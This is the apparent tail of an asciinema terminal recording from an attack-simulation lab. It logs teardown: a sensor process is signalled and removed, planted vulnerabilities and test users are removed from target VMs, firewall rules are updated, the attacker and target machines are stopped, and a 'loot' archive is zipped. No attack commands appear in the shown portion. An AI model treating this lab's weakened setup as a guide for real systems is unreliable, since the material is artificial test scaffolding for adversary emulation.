stdout)\r\n=== stderr ===\r\nCould Not Find C:\\capture\\winidp_data.zip\r\n\r\nDebug: Stderr: Could Not Find C:\\capture\\winidp_data.zip\r\n"] [1169.86244, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [1170.144087, "o", " 1 file(s) copied.\r\r\n"] [1170.158542, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] [1170.216215, "o", "sudo kill -SIGHUP $(pidof -s idpx); while [ ! -f /tmp/idpx.proto ]; do sleep 1; done ; rm ~/idpx\r\n"] [1171.267669, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [1171.275309, "o", "\u001b[94m Uninstalling vulnerabilities on target2w \u001b[0m\r\n"] [1171.339028, "o", "The command completed successfully.\r\r\n\r\r\n"] [1171.356677, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"] [1171.45084, "o", "The command completed successfully.\r\r\n\r\r\n"] [1171.473186, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe command completed successfully.\r\n\r\n(no stderr)\r\n"] [1171.543427, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] [1171.803471, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] [1172.047409, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] [1172.31145, "o", "'\"NET LOCALGROUP \"Remote' is not recognized as an internal or external command,\r\r\noperable program or batch file.\r\r\n"] [1172.570747, "o", "The operation completed successfully.\r\r\r\n"] [1172.583944, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] [1172.807534, "o", "\r\r\nUpdated 3 rule(s).\r\r\n"] [1172.807667, "o", "Ok.\r\r\n"] [1172.807739, "o", "\r\r\n"] [1172.844854, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n\u001b[92m Done uninstalling vulnerabilities on target2w \u001b[0m\r\n\u001b[94m Uninstalling vulnerabilities on target3 \u001b[0m\r\n"] [1172.862366, "o", "userdel: test mail spool (/var/mail/test) not found\r\n"] [1172.877426, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: test mail spool (/var/mail/test) not found\r\n\r\nDebug: Stderr: userdel: test mail spool (/var/mail/test) not found\r\n"] [1172.925985, "o", "userdel: password mail spool (/var/mail/password) not found\r\n"] [1172.945432, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nuserdel: password mail spool (/var/mail/password) not found\r\n\r\nDebug: Stderr: userdel: password mail spool (/var/mail/password) not found\r\n"] [1172.957449, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [1173.009901, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] [1173.010037, "o", "\u001b[92m Done uninstalling vulnerabilities on target3 \u001b[0m\r\n\u001b[94mStopping machine: target2 \u001b[0m\r\n"] [1176.20632, "o", "\u001b[92mMachine stopped: target2\u001b[0m\r\n\u001b[94mStopping machine: target3 \u001b[0m\r\n"] [1181.648082, "o", "\u001b[92mMachine stopped: target3\u001b[0m\r\n\u001b[94mStopping machine: attacker \u001b[0m\r\n"] [1186.901824, "o", "\u001b[92mMachine stopped: attacker\u001b[0m\r\n"] [1186.90263, "o", "Creating zip file loot/2021_06_09___08_38_02/2021_06_09___08_38_02.zip\r\n"] [1186.931928, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] [1233.852884, "o", "e"] [1234.124846, "o", "x"] [1234.380891, "o", "i"] [1234.556928, "o", "t"] [1235.261009, "o", "\r\n"] [1235.261116, "o", "exit\r\n"]